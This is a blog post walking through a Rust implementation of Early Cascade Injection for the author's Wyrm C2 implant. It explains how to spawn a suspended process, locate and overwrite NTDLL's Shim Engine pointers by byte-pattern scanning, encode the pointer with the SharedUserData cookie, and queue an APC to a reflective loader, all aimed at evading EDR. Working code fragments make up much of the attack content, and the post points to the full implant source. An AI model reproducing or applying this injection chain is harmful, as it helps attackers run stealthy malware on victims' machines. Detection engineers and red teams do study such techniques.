Crimes against NTDLL - Implementing Early Cascade Injection

Thread creation is so last year

Intro

You can find this implementation in my Wyrm C2 framework on GitHub.

Early Cascade Injection was published by Outflank in 2024. Full credit goes to them for discovering the technique - this post deals with the implementation of Early Cascade Injection in Rust.

I recommend reading Outflank’s blog post - however, as a quick primer, the technique allows for the loading of fileless malware in a foreign process without having to perform typical (and heavily monitored) process injection. This is also useful as a primitive to spawn a new sacrificial process for doing things such as execute-assembly in the Cobalt Strike world (Wyrm does not implement this yet with a sacrificial process but uses the dotex command to run dotnet code in memory).

There are two general buckets for running shellcode in foreign processes (exploits aside):

Process injection where the process is already running, or;
Spawn and inject, such as Process Hollowing, Early Bird Injection etc.

The problem with these attack surfaces, is they are very well documented and as such, likely to be detected by EDRs.

The clever trick about Early Cascade Injection, is it allows us to have code execution on our shellcode bootstrap without creating a suspicious thread, or using suspicious cross process Asynchronous Procedure Calls (APC). Instead, we create the process in a suspended state (as is the norm with early process injection techniques), and we surgically tamper with NTDLL before the first usermode thread runs.

When a new process is started, the Windows kernel performs certain actions in order to set up a process, one of those, is mapping NTDLL into memory. Importantly, after the kernel has finished setting up the scaffolding of the process, the thread will then switch into usermode and begin through ntdll!LdrInitializeThunk. As Outflank explains, creating a process in a suspended state with the CREATE_SUSPENDED flag, the usermode thread will not run until that thread is resumed.

The Shim Engine

I am purposefully missing out a lot of detail around how Outflank arrived here - their blog post does an excellent job of talking about the internals of NTDLL and EDR Preloading.

However, the Shim Engine is a technology implemented in NTDLL which is designed as a compatibility framework intercepting API calls from older applications modifying them to work on newer versions of Windows. The machinery of the engine is implemented in NTDLL, and it is that machinery which Outflank discovered can be abused for process injection.

A global variable internal to NTDLL was discovered called g_pfnSE_DllLoaded, which is part of the Shim Engine, is a pointer which can be modified by us to point to attacker controlled shellcode. To use this variable, we need to enable a flag named g_ShimsEnabled, which instructs the thread to start performing the Shim Engine routines.

Modifying these two gives us shellcode execution, however, we don’t want the full machinery of the Shim Engine to start running. Outflank chose this variable (g_pfnSE_DllLoaded) to abuse as it is the first in a series of pointers that gets dispatched; meaning as soon as we begin executing our stub, we must disable g_ShimsEnabled so that the rest of the Shim Engine doesn’t run.

Finally, in the shellcode stub which runs, we can queue up an APC in the current thread which is not nearly as suspicious as cross-process APCs. If you want some info on abusing cross-process APCs, check my blog post on APC Queue Injection.

So, the elements we need to make this work are:

Stage 0 - Initiator process (a loader, existing implant, etc) which creates the suspended process.
Stage 1 - Shim engine bootstrap shellcode that gets injected into the suspended process.
Stage 2 - A post-exploitation payload (such as the Wyrm C2 framework).

For the stage 2 payload, it must be capable of performing Reflective DLL Injection at the start address of the queued APC, or your stage 1 stub needs to set up the post-ex payload.

There is one complication to solve - the variables we need to modify are not exported in any way that we could link against them or somehow call them via FFI. So, how do we manipulate them? Well, the approach I took was simple pattern matching of code which uses these pointers, and then taking the address of the variable in memory. For example, the below byte patterns represent the machine code, and the comments represent the instructions:

const G_PFNSE_DLLLOADED_PATTERN: &[u8] = &[
    0x48, 0x8b, 0x3d, 0xd0, 0xc3, 0x12, 0x00,   // mov  rdi, qword ptr [ntdll!g_pfnSE_DllLoaded (############)]
    0x83, 0xe0, 0x3f,                           // and  eax, 3Fh
    0x44, 0x2b, 0xe0,                           // sub  r12d, eax
    0x8b, 0xc2,                                 // mov  eax, edx
    0x41, 0x8a, 0xcc                            // mov  cl, r12b
];

const G_SHIMS_ENABLED_PATTERN: &[u8] = &[
    0xe8, 0x33, 0x38, 0xf5, 0xff,               // call ntdll!RtlEnterCriticalSection (7ff9ddead780)
    0x44, 0x38, 0x2d, 0xe4, 0x84, 0x11, 0x00,   // cmp  byte ptr [ntdll!g_ShimsEnabled (7ff9de072438)], r13b
    0x48, 0x8d, 0x35, 0x95, 0x89, 0x11, 0x00,   // lea  rsi, [ntdll!PebLdr+0x10 (7ff9de0728f0)]
];

Then, using a simple function, we can scan the NTDLL module for these patterns. This is somewhat brittle as these bytes could change between builds of NTDLL. A better approach could be to wildcard the offset bytes and search pattern match on the instructions around that which likely have a better chance at being consistent between patches.

Implementation

Stage zero

Ok - lets start with the stage zero payload which is the ‘initiator’. This has a few jobs:

Create a process in the suspended state.
Inject the stage two post-ex payload (in this case, Wyrm).
Position the address of the stage one shellcode (which in this case, is included in the injected memory from step 2).
Encode the pointer to the shellcode with the cookie found in: SharedUserData!Cookie found at the constant address 0x7FFE0330.
Write the 2 pointers in the NTDLL Shim Engine.
Resume the thread.

There is very little point in me just doing a copy-paste of the code to implement this, you can see it in the function early_cascade_spawn_child in the Wyrm source: src/spawn_inject/early_cascade.rs. However, I will call out a few important things:

On step 3, I did not write separate shellcode for the bootstrap. Instead, I wrote the bootstrap in no_std Rust meaning it does not rely on the standard library. The result is code that is sufficiently position independent to place in memory and execute directly, effectively behaving like shellcode. This is incredibly ergonomic.

In Wyrm I provide a function called Shim which acts as this ‘shellcode bootstrap’ for using Early Cascade Injection, and we will take a look at that code in the Stage One section. So, the address we will put into g_pfnSE_DllLoaded, is the address of the Shim function - allowing the thread to start executing straight up machine code with no dependencies. Neat!

The next thing to talk about here is having to encode our pointer that we write to g_pfnSE_DllLoaded. The shim callback pointer is stored in an encoded form, so writing a raw function pointer into g_pfnSE_DllLoaded will not work. Luckily for us, the key (cookie) used for the encryption is found in SharedUserData!Cookie, which is at a constant address (64-bit) of 0x7FFE0330. So, we can write a function that performs the pointer encryption, returning the encrypted copy of the pointer:

fn encode_system_ptr(ptr: *const c_void) -> *const c_void {
    // get pointer cookie from SharedUserData!Cookie (0x330)
    let cookie = unsafe { *(0x7FFE0330 as *const u32) };

    // rotr64
    let ptr_val = ptr as usize;
    let xored = cookie as usize ^ ptr_val;
    let rotated = xored.rotate_right((cookie & 0x3F) as u32);

    rotated as *const c_void
}

Finally, we want to talk about how to resolve the global variables we wish to write to. As stipulated we are going to pattern match usage of the pointers in NTDLL, to discover their true address based on the offset of where we found it.

To follow through in its entirety, check the source in shared_no_std/src/memory.rs.

So, we take the two patterns:

const G_PFNSE_DLLLOADED_PATTERN: &[u8] = &[
    0x48, 0x8b, 0x3d, 0xd0, 0xc3, 0x12, 0x00,   // mov  rdi, qword ptr [ntdll!g_pfnSE_DllLoaded (############)]
    0x83, 0xe0, 0x3f,                           // and  eax, 3Fh
    0x44, 0x2b, 0xe0,                           // sub  r12d, eax
    0x8b, 0xc2,                                 // mov  eax, edx
    0x41, 0x8a, 0xcc                            // mov  cl, r12b
];

const G_SHIMS_ENABLED_PATTERN: &[u8] = &[
    0xe8, 0x33, 0x38, 0xf5, 0xff,               // call ntdll!RtlEnterCriticalSection (7ff9ddead780)
    0x44, 0x38, 0x2d, 0xe4, 0x84, 0x11, 0x00,   // cmp  byte ptr [ntdll!g_ShimsEnabled (7ff9de072438)], r13b
    0x48, 0x8d, 0x35, 0x95, 0x89, 0x11, 0x00,   // lea  rsi, [ntdll!PebLdr+0x10 (7ff9de0728f0)]
];

And we search for their usage with this simple function where we pass the pattern as the third argument. The first and second args relate to the base address of NTDLL and its size:

#[inline(always)]
pub fn scan_module_for_byte_pattern(
    image_base: *const c_void,
    image_size: usize,
    pattern: &[u8],
) -> Result<*const c_void, ()> {
    // Convert the raw address pointer to a byte pointer so we can read individual bytes
    let image_base = image_base as *const u8;
    let mut cursor = image_base as *const u8;
    // End of image denotes the end of our reads, if nothing is found by that point we have not found the
    // sequence of bytes
    let end_of_image = unsafe { image_base.add(image_size) };

    while cursor != end_of_image {
        unsafe {
            let bytes = from_raw_parts(cursor, pattern.len());

            if bytes == pattern {
                return Ok(cursor as *const _);
            }

            cursor = cursor.add(1);
        }
    }

    Err(())
}

Then, we need to calculate the difference between the address where we found the start of the machine code, and the offset in the machine code which is where the variable lives:

let p_g_pfnse_dll_loaded = unsafe {
    const INSTRUCTION_LEN: isize = 7;

    // Offset by 3 bytes to get the imm, and read the imm as a 4 byte value
    let offset = read_unaligned((p_text_g_pfnse_dll_loaded as *const u8).add(3) as *const i32);
    let offset = offset as isize + INSTRUCTION_LEN;

    (p_text_g_pfnse_dll_loaded as isize + offset) as *mut c_void
};

And with that, we can resolve both internal variables addresses! All that is left to do is set g_pfnse_dll_loaded to the encrypted address we dealt with earlier, and set g_ShimsEnabled to 1.

Stage one

The stage one that is capable of being executed by a fresh thread is found in the Shim function in implant/src/stubs/shim.rs.

Whilst operating here we do have some restrictions - we should also assume kernel32 and kernelbase are not available for use, meaning we are limited to the core library, compiler intrinsics and functions exported in NTDLL. This is fine, we can work with this for what we need.

The stage one has a few duties:

Resolve the address of NtQueueApcThread so we can launch the stage two.
Disable the g_ShimsEnabled variable we enabled from stage zero.
Queue an APC via NtQueueApcThread pointing to the stage two.

To resolve the address of NtQueueApcThread, I use a variation of my export-resolver crate which I have embedded into Wyrm. In short, this uses PEB walking to resolve the addresses of functions we wish to use. The variation included in Wyrm is no_std compliant such that we can use it in our free standing stub.

Next, we search for g_ShimsEnabled and set it to 0, in exactly the same way shown above. Again - the code I wrote to resolve the addresses is no_std.

Finally, we can call NtQueueApcThread to queue an APC at the address of the reflective loader of Wyrm.

In order to use this function, we first must declare its prototype:

type NtQueueApcThread = unsafe extern "system" fn(
    thread_handle: isize,
    apc_routine: *const c_void,
    arg1: usize,
    arg2: usize,
    arg3: usize,
) -> u32;

And then cast the address we found via the export-resolver variant to the type NtQueueApcThread:

let p_nt_queue_apc_thread = resolve_address("ntdll.dll", "NtQueueApcThread", None);
let NtQueueApcThread = core::mem::transmute::<_, NtQueueApcThread>(p_nt_queue_apc_thread);

Then we set up our arguments which go into the function, and call it normally (where Load is the name of the function in Wyrm which performs reflective DLL loading):

let current_thread = -2isize;
let apc_routine = Load as *const c_void;
let apc_arg1 = 0usize;
let apc_arg2 = 0usize;
let apc_arg3 = 0usize;

NtQueueApcThread(current_thread, apc_routine, apc_arg1, apc_arg2, apc_arg3);

The eagle-eyed reader may be wondering how the queued APC is actually run - well, helpfully, when the thread starts executing in NTDLL, after our shim magic has run, NTDLL makes a call to NtTestAlert which causes any queued items in the APC queue to dispatch, giving us free execution without having to either wait on a prayer, or call NtTestAlert ourselves.

Stage two

Finally, our stage two loads - in this case it’s the Wyrm reflective DLL loader. I’m not going into the internals of that here as it’s pretty complex, however you can check the source at: implant/src/stubs/rdi.rs.